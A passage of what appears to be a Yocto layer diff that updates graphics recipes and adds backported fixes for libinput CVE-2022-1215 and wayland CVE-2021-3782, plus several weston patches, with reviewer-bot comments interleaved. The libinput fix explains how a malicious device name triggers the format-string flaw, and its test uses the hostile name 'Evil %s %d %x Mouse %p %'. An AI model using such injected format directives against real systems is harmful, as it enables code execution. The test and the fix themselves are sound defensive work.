+ git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \
+ git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \
file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \
"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
index 72c29a72a2..c58a801e03 100644
--- a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
@@ -1,11 +1,15 @@
SUMMARY = "Vulkan Header files and API registry"
+DESCRIPTION = "Vulkan is a 3D graphics and compute API providing cross-platform access \
+to modern GPUs with low overhead and targeting realtime graphics applications such as \
+games and interactive media. This package contains the development headers \
+for packages wanting to make use of Vulkan."
HOMEPAGE = "https://www.khronos.org/vulkan/"
BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers"
SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84"
diff --git a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
index 504cf85a2b..c8352bf31d 100644
--- a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
index 2fd61c989a..ec65f11952 100644
--- a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
@@ -1,11 +1,12 @@
SUMMARY = "Vulkan Utilities and Tools"
+DESCRIPTION = "Assist development by enabling developers to verify their applications correct use of the Vulkan API."
HOMEPAGE = "https://www.khronos.org/vulkan/"
BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools"
SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
index a620295978..f0dc780ca1 100644
--- a/meta/recipes-graphics/waffle/waffle_1.6.0.bb
+++ b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
@@ -1,13 +1,21 @@
-SUMMARY = "cross-platform C library to defer selection of GL API and of window system"
+SUMMARY = "A C library for selecting an OpenGL API and window system at runtime"
+DESCRIPTION = "A cross-platform C library that allows one to defer selection \
+of an OpenGL API and window system until runtime. For example, on Linux, Waffle \
+enables an application to select X11/EGL with an OpenGL 3.3 core profile, \
+Wayland with OpenGL ES2, and other window system / API combinations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \
file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf"
-SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz"
-SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7"
-SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7"
+SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2"
+SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942"
+SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb"
-UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html"
+S = "${WORKDIR}/${BPN}-v${PV}"
+
+UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases"
inherit meson features_check lib_package bash-completion
diff --git a/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
new file mode 100644
index 0000000000..313c0c5eb2
--- /dev/null
+++ b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
@@ -0,0 +1,360 @@
+From 2a8b8fde90d63d48ce09ddae44142674bbca1c28 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Mar 2022 09:25:22 +1000
+Subject: [PATCH] evdev: strip the device name of format directives
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes a format string vulnerabilty.
+
+evdev_log_message() composes a format string consisting of a fixed
+prefix (including the rendered device name) and the passed-in format
+buffer. This format string is then passed with the arguments to the
+actual log handler, which usually and eventually ends up being printf.
+
+If the device name contains a printf-style format directive, these ended
+up in the format string and thus get interpreted correctly, e.g. for a
+device "Foo%sBar" the log message vs printf invocation ends up being:
+ evdev_log_message(device, "some message %s", "some argument");
+ printf("event9 - Foo%sBar: some message %s", "some argument");
+
+This can enable an attacker to execute malicious code with the
+privileges of the process using libinput.
+
+To exploit this, an attacker needs to be able to create a kernel device
+with a malicious name, e.g. through /dev/uinput or a Bluetooth device.
+
+To fix this, convert any potential format directives in the device name
+by duplicating percentages.
+
+Pre-rendering the device to avoid the issue altogether would be nicer
+but the current log level hooks do not easily allow for this. The device
+name is the only user-controlled part of the format string.
+
+A second potential issue is the sysname of the device which is also
+sanitized.
+
+This issue was found by Albin Eldstål-Ahrens and Benjamin Svensson from
+Assured AB, and independently by Lukas Lamster.
+
+Fixes #752
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+(cherry picked from commit a423d7d3269dc32a87384f79e29bb5ac021c83d1)
+
+CVE: CVE-2022-1215
+Upstream Status: Backport [https://gitlab.freedesktop.org/libinput/libinput/-/commit/2a8b8fde90d63d48ce09ddae44142674bbca1c28]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ meson.build | 1 +
+ src/evdev.c | 31 +++++++++++------
+ src/evdev.h | 6 ++--
+ src/util-strings.h | 30 ++++++++++++++++
+ test/litest-device-format-string.c | 56 ++++++++++++++++++++++++++++++
+ test/litest.h | 1 +
+ test/test-utils.c | 26 ++++++++++++++
+ 7 files changed, 139 insertions(+), 12 deletions(-)
+ create mode 100644 test/litest-device-format-string.c
+
+diff --git a/meson.build b/meson.build
+index 90f528e6..1f6159e7 100644
+--- a/meson.build
++++ b/meson.build
+@@ -787,6 +787,7 @@
+ 'test/litest-device-dell-canvas-totem-touch.c',
+ 'test/litest-device-elantech-touchpad.c',
+ 'test/litest-device-elan-tablet.c',
++ 'test/litest-device-format-string.c',
+ 'test/litest-device-generic-singletouch.c',
+ 'test/litest-device-gpio-keys.c',
+ 'test/litest-device-huion-pentablet.c',
+diff --git a/src/evdev.c b/src/evdev.c
+index 6d81f58f..d1c35c07 100644
+--- a/src/evdev.c
++++ b/src/evdev.c
+@@ -2356,19 +2356,19 @@ evdev_device_create(struct libinput_seat *seat,
+ struct libinput *libinput = seat->libinput;
+ struct evdev_device *device = NULL;
+ int rc;
+- int fd;
++ int fd = -1;
+ int unhandled_device = 0;
+ const char *devnode = udev_device_get_devnode(udev_device);
+- const char *sysname = udev_device_get_sysname(udev_device);
++ char *sysname = str_sanitize(udev_device_get_sysname(udev_device));
+
+ if (!devnode) {
+ log_info(libinput, "%s: no device node associated\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ if (udev_device_should_be_ignored(udev_device)) {
+ log_debug(libinput, "%s: device is ignored\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ /* Use non-blocking mode so that we can loop on read on
+@@ -2382,13 +2382,15 @@ evdev_device_create(struct libinput_seat *seat,
+ sysname,
+ devnode,
+ strerror(-fd));
+- return NULL;
++ goto err;
+ }
+
+ if (!evdev_device_have_same_syspath(udev_device, fd))
+ goto err;
+
+ device = zalloc(sizeof *device);
++ device->sysname = sysname;
++ sysname = NULL;
+
+ libinput_device_init(&device->base, seat);
+ libinput_seat_ref(seat);
+@@ -2411,6 +2413,9 @@ evdev_device_create(struct libinput_seat *seat,
+ device->dispatch = NULL;
+ device->fd = fd;
+ device->devname = libevdev_get_name(device->evdev);
++ /* the log_prefix_name is used as part of a printf format string and
++ * must not contain % directives, see evdev_log_msg */
++ device->log_prefix_name = str_sanitize(device->devname);
+ device->scroll.threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction_lock_threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction = 0;
+@@ -2238,9 +2238,14 @@
+ return device;
+
+ err:
+- close_restricted(libinput, fd);
+- if (device)
+- evdev_device_destroy(device);
++ if (fd >= 0) {
++ close_restricted(libinput, fd);
++ if (device) {
++ unhandled_device = device->seat_caps == 0;
++ evdev_device_destroy(device);
++ }
++ }
++ free(sysname);
+
+ return unhandled_device ? EVDEV_UNHANDLED_DEVICE : NULL;
+ }
+@@ -2469,7 +2478,7 @@ evdev_device_get_output(struct evdev_device *device)
+ const char *
+ evdev_device_get_sysname(struct evdev_device *device)
+ {
+- return udev_device_get_sysname(device->udev_device);
++ return device->sysname;
+ }
+
+ const char *
+@@ -3066,6 +3075,8 @@ evdev_device_destroy(struct evdev_device *device)
+ if (device->base.group)
+ libinput_device_group_unref(device->base.group);
+
++ free(device->log_prefix_name);
++ free(device->sysname);
+ free(device->output_name);
+ filter_destroy(device->pointer.filter);
+ libinput_timer_destroy(&device->scroll.timer);
+diff --git a/src/evdev.h b/src/evdev.h
+index c7d130f8..980c5943 100644
+--- a/src/evdev.h
++++ b/src/evdev.h
+@@ -169,6 +169,8 @@ struct evdev_device {
+ struct udev_device *udev_device;
+ char *output_name;
+ const char *devname;
++ char *log_prefix_name;
++ char *sysname;
+ bool was_removed;
+ int fd;
+ enum evdev_device_seat_capability seat_caps;
+@@ -786,7 +788,7 @@ evdev_log_msg(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+@@ -824,7 +826,7 @@ evdev_log_msg_ratelimit(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+diff --git a/src/util-strings.h b/src/util-strings.h
+index 2a15fab3..d5a84146 100644
+--- a/src/util-strings.h
++++ b/src/util-strings.h
+@@ -42,6 +42,7 @@
+ #ifdef HAVE_XLOCALE_H
+ #include <xlocale.h>
+ #endif
++#include "util-macros.h"
+
+ #define streq(s1, s2) (strcmp((s1), (s2)) == 0)
+ #define strneq(s1, s2, n) (strncmp((s1), (s2), (n)) == 0)
+@@ -312,3 +313,31 @@
+ free(result);
+ return -1;
+ }
++
++/**
++ * Return a copy of str with all % converted to %% to make the string
++ * acceptable as printf format.
++ */
++static inline char *
++str_sanitize(const char *str)
++{
++ if (!str)
++ return NULL;
++
++ if (!strchr(str, '%'))
++ return strdup(str);
++
++ size_t slen = min(strlen(str), 512);
++ char *sanitized = zalloc(2 * slen + 1);
++ const char *src = str;
++ char *dst = sanitized;
++
++ for (size_t i = 0; i < slen; i++) {
++ if (*src == '%')
++ *dst++ = '%';
++ *dst++ = *src++;
++ }
++ *dst = '\0';
++
++ return sanitized;
++}
+diff --git a/test/litest-device-format-string.c b/test/litest-device-format-string.c
+new file mode 100644
+index 00000000..aed15db4
+--- /dev/null
++++ b/test/litest-device-format-string.c
+@@ -0,0 +1,56 @@
++
++/*
++ * Copyright © 2013 Red Hat, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice (including the next
++ * paragraph) shall be included in all copies or substantial portions of the
++ * Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
++ * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
++ * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
++ * DEALINGS IN THE SOFTWARE.
++ */
++
++#include "config.h"
++
++#include "litest.h"
++#include "litest-int.h"
++
++static struct input_id input_id = {
++ .bustype = 0x3,
++ .vendor = 0x0123,
++ .product = 0x0456,
++};
++
++static int events[] = {
++ EV_KEY, BTN_LEFT,
++ EV_KEY, BTN_RIGHT,
++ EV_KEY, BTN_MIDDLE,
++ EV_REL, REL_X,
++ EV_REL, REL_Y,
++ EV_REL, REL_WHEEL,
++ EV_REL, REL_WHEEL_HI_RES,
++ -1 , -1,
++};
++
++TEST_DEVICE("mouse-format-string",
++ .type = LITEST_MOUSE_FORMAT_STRING,
++ .features = LITEST_RELATIVE | LITEST_BUTTON | LITEST_WHEEL,
++ .interface = NULL,
++
++ .name = "Evil %s %d %x Mouse %p %",
++ .id = &input_id,
++ .absinfo = NULL,
++ .events = events,
++)
+diff --git a/test/litest.h b/test/litest.h
+index 4982e516..1b1daa90 100644
+--- a/test/litest.h
++++ b/test/litest.h
+@@ -303,6 +303,7 @@
+ LITEST_ALPS_3FG,
+ LITEST_ELAN_TABLET,
+ LITEST_ABSINFO_OVERRIDE,
++ LITEST_MOUSE_FORMAT_STRING,
+ };
+
+ #define LITEST_DEVICELESS -2
+diff --git a/test/test-utils.c b/test/test-utils.c
+index 989adecd..e80754be 100644
+--- a/test/test-utils.c
++++ b/test/test-utils.c
+@@ -1267,6 +1267,31 @@ START_TEST(strstartswith_test)
+ }
+ END_TEST
+
++START_TEST(strsanitize_test)
++{
++ struct strsanitize_test {
++ const char *string;
++ const char *expected;
++ } tests[] = {
++ { "foobar", "foobar" },
++ { "", "" },
++ { "%", "%%" },
++ { "%%%%", "%%%%%%%%" },
++ { "x %s", "x %%s" },
++ { "x %", "x %%" },
++ { "%sx", "%%sx" },
++ { "%s%s", "%%s%%s" },
++ { NULL, NULL },
++ };
++
++ for (struct strsanitize_test *t = tests; t->string; t++) {
++ char *sanitized = str_sanitize(t->string);
++ ck_assert_str_eq(sanitized, t->expected);
++ free(sanitized);
++ }
++}
++END_TEST
++
+ START_TEST(list_test_insert)
+ {
+ struct list_test {
+@@ -1138,6 +1138,7 @@
+ tcase_add_test(tc, strsplit_test);
+ tcase_add_test(tc, kvsplit_double_test);
+ tcase_add_test(tc, strjoin_test);
++ tcase_add_test(tc, strsanitize_test);
+ tcase_add_test(tc, time_conversion);
+
+ tcase_add_test(tc, list_test_insert);
+
+--
+GitLab
+
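Review bot: The patch header `Upstream Status: Backport [...]` spells the tag with a space, while the other backport on this page (CVE-2021-3782.patch) uses `Upstream-Status:`. Tooling that scans patches for the hyphenated tag will likely report this CVE fix as having no status, so the line should read `Upstream-Status: Backport [https://gitlab.freedesktop.org/libinput/libinput/-/commit/2a8b8fde90d63d48ce09ddae44142674bbca1c28]`. In the embedded `str_sanitize()`, the 512-byte cap is applied only on the path that found a `%`; names without one are copied by `strdup()` at full length, which does not weaken the format-string fix but deserves a one-line comment such as `/* length cap applies only when escaping is needed */`. The embedded hunk headers `@@ -2238,9 +2238,14 @@` (src/evdev.c) and `@@ -1138,6 +1138,7 @@` (test/test-utils.c) are out of order relative to their neighbours, which suggests hand-adjusted context, so it is worth confirming that the patch applies to 1.15.2 without fuzz.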
diff --git a/meta/recipes-graphics/wayland/libinput_1.15.2.bb b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
index 810532774e..d7927d132a 100644
--- a/meta/recipes-graphics/wayland/libinput_1.15.2.bb
+++ b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
@@ -14,6 +14,7 @@ DEPENDS = "libevdev udev mtdev"
SRC_URI = "http://www.freedesktop.org/software/${BPN}/${BP}.tar.xz \
file://determinism.patch \
+ file://CVE-2022-1215.patch \
"
SRC_URI[md5sum] = "eb6bd2907ad33d53954d70dfb881a643"
SRC_URI[sha256sum] = "971c3fbfb624f95c911adeb2803c372e4e3647d1b98f278f660051f834597747"
diff --git a/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
new file mode 100644
index 0000000000..df204508e9
--- /dev/null
+++ b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
@@ -0,0 +1,111 @@
+From 5eed6609619cc2e4eaa8618d11c15d442abf54be Mon Sep 17 00:00:00 2001
+From: Derek Foreman <derek.foreman@collabora.com>
+Date: Fri, 28 Jan 2022 13:18:37 -0600
+Subject: [PATCH] util: Limit size of wl_map
+
+Since server IDs are basically indistinguishable from really big client
+IDs at many points in the source, it's theoretically possible to overflow
+a map and either overflow server IDs into the client ID space, or grow
+client IDs into the server ID space. This would currently take a massive
+amount of RAM, but the definition of massive changes yearly.
+
+Prevent this by placing a ridiculous but arbitrary upper bound on the
+number of items we can put in a map: 0xF00000, somewhere over 15 million.
+This should satisfy pathological clients without restriction, but stays
+well clear of the 0xFF000000 transition point between server and client
+IDs. It will still take an improbable amount of RAM to hit this, and a
+client could still exhaust all RAM in this way, but our goal is to prevent
+overflow and undefined behaviour.
+
+Fixes #224
+
+Signed-off-by: Derek Foreman <derek.foreman@collabora.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3782
+
+Reference to upstream patch:
+https://gitlab.freedesktop.org/wayland/wayland/-/commit/b19488c7154b902354cb26a27f11415d7799b0b2
+
+[DP: adjust context for wayland version 1.20.0]
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ src/wayland-private.h | 1 +
+ src/wayland-util.c | 25 +++++++++++++++++++++++--
+ 2 files changed, 24 insertions(+), 2 deletions(-)
+
+diff --git a/src/wayland-private.h b/src/wayland-private.h
+index 9bf8cb7..35dc40e 100644
+--- a/src/wayland-private.h
++++ b/src/wayland-private.h
+@@ -45,6 +45,7 @@
+ #define WL_MAP_SERVER_SIDE 0
+ #define WL_MAP_CLIENT_SIDE 1
+ #define WL_SERVER_ID_START 0xff000000
++#define WL_MAP_MAX_OBJECTS 0x00f00000
+ #define WL_CLOSURE_MAX_ARGS 20
+
+ struct wl_object {
+diff --git a/src/wayland-util.c b/src/wayland-util.c
+index d5973bf..3e45d19 100644
+--- a/src/wayland-util.c
++++ b/src/wayland-util.c
+@@ -195,6 +195,7 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ union map_entry *start, *entry;
+ struct wl_array *entries;
+ uint32_t base;
++ uint32_t count;
+
+ if (map->side == WL_MAP_CLIENT_SIDE) {
+ entries = &map->client_entries;
+@@ -215,10 +216,25 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ start = entries->data;
+ }
+
++ /* wl_array only grows, so if we have too many objects at
++ * this point there's no way to clean up. We could be more
++ * pro-active about trying to avoid this allocation, but
++ * it doesn't really matter because at this point there is
++ * nothing to be done but disconnect the client and delete
++ * the whole array either way.
++ */
++ count = entry - start;
++ if (count > WL_MAP_MAX_OBJECTS) {
++ /* entry->data is freshly malloced garbage, so we'd
++ * better make it a NULL so wl_map_for_each doesn't
++ * dereference it later. */
++ entry->data = NULL;
++ return 0;
++ }
+ entry->data = data;
+ entry->next |= (flags & 0x1) << 1;
+
+- return (entry - start) + base;
++ return count + base;
+ }
+
+ int
+@@ -235,6 +251,9 @@ wl_map_insert_at(struct wl_map *map, uint32_t flags, uint32_t i, void *data)
+ i -= WL_SERVER_ID_START;
+ }
+
++ if (i > WL_MAP_MAX_OBJECTS)
++ return -1;
++
+ count = entries->size / sizeof *start;
+ if (count < i)
+ return -1;
+@@ -269,8 +288,10 @@ wl_map_reserve_new(struct wl_map *map, uint32_t i)
+ i -= WL_SERVER_ID_START;
+ }
+
+- count = entries->size / sizeof *start;
++ if (i > WL_MAP_MAX_OBJECTS)
++ return -1;
+
++ count = entries->size / sizeof *start;
+ if (count < i)
+ return -1;
+
+--
+2.37.3
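Review bot: The adaptation note `[DP: adjust context for wayland version 1.20.0]` does not match the recipe that picks this patch up on this page, `wayland_1.18.0.bb`. The note should name the version the context was actually adjusted and tested against, e.g. `[DP: adjust context for wayland version 1.18.0]` if that is the case. In `wl_map_insert_new()` the limit is checked only after the slot has been obtained, and the function then returns 0, so the fix depends on every caller treating 0 as failure; those callers are outside this patch and should be checked in the 1.18.0 sources. `Upstream-Status: Backport` would also be easier to audit with the commit URL in brackets on the same line rather than in a separate paragraph.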
diff --git a/meta/recipes-graphics/wayland/wayland_1.18.0.bb b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
index 00be3aac27..e621abddbf 100644
--- a/meta/recipes-graphics/wayland/wayland_1.18.0.bb
+++ b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
@@ -18,6 +18,7 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
file://0002-Do-not-hardcode-the-path-to-wayland-scanner.patch \
file://0001-build-Fix-strndup-detection-on-MinGW.patch \
file://0001-meson-tests-add-missing-dependencies-on-protocol-hea.patch \
+ file://CVE-2021-3782.patch \
"
SRC_URI[md5sum] = "23317697b6e3ff2e1ac8c5ba3ed57b65"
SRC_URI[sha256sum] = "4675a79f091020817a98fd0484e7208c8762242266967f55a67776936c2e294d"
diff --git a/meta/recipes-graphics/wayland/weston-init/weston.ini b/meta/recipes-graphics/wayland/weston-init/weston.ini
index 1e6dff68fd..40c5195887 100644
--- a/meta/recipes-graphics/wayland/weston-init/weston.ini
+++ b/meta/recipes-graphics/wayland/weston-init/weston.ini
@@ -42,7 +42,7 @@ require-input=false
#path=/build/weston-0lEgCh/weston-1.11.0/weston-flower
#[input-method]
-#path=/usr/lib/weston/weston-keyboard
+#path=/usr/libexec/weston-keyboard
#[output]
#name=LVDS1
diff --git a/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
new file mode 100644
index 0000000000..fb36d3817a
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
@@ -0,0 +1,32 @@
+From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 20:03:49 +0200
+Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg
+ top-level surface
+
+The shsurf is calloc'ed so the surface count is always 0. Not only
+that but the surface is not set as active by default, so there's no
+need to de-activate it.
+
+Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 442a625f..3791be25 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface,
+ wl_list_init(&shsurf->children_link);
+
+ weston_desktop_surface_set_user_data(desktop_surface, shsurf);
+- weston_desktop_surface_set_activated(desktop_surface,
+- shsurf->focus_count > 0);
+ }
+
+ static void
+--
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
new file mode 100644
index 0000000000..dcd0700fca
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
@@ -0,0 +1,57 @@
+From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:40:22 +0200
+Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to
+ activate/de-activate
+
+This way it better reflects that it handles activation rather that input
+focus.
+
+Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 3791be25..c4669f11 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data)
+ }
+
+ static void
+-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_deactivate(struct shell_surface *shsurf)
+ {
+ if (--shsurf->focus_count == 0)
+ weston_desktop_surface_set_activated(shsurf->desktop_surface, false);
+ }
+
+ static void
+-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_activate(struct shell_surface *shsurf)
+ {
+ if (shsurf->focus_count++ == 0)
+ weston_desktop_surface_set_activated(shsurf->desktop_surface, true);
+@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ if (seat->focused_surface) {
+ struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ if (shsurf)
+- shell_surface_lose_keyboard_focus(shsurf);
++ shell_surface_deactivate(shsurf);
+ }
+
+ seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ if (seat->focused_surface) {
+ struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ if (shsurf)
+- shell_surface_gain_keyboard_focus(shsurf);
++ shell_surface_activate(shsurf);
+ }
+ }
+
+--
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
new file mode 100644
index 0000000000..7ca72f8494
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
@@ -0,0 +1,99 @@
+From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:44:26 +0200
+Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when
+ activating
+
+We shouldn't be constrained by having a keyboard plugged-in, so avoid
+activating/de-activating the window/surface in the keyboard focus
+handler and embed it straight into the window activation part.
+
+Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 41 +++++++++++++++++++++++++----------------
+ 1 file changed, 25 insertions(+), 16 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index c4669f11..c6a4fe91 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf)
+ static void
+ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ {
+- struct weston_keyboard *keyboard = data;
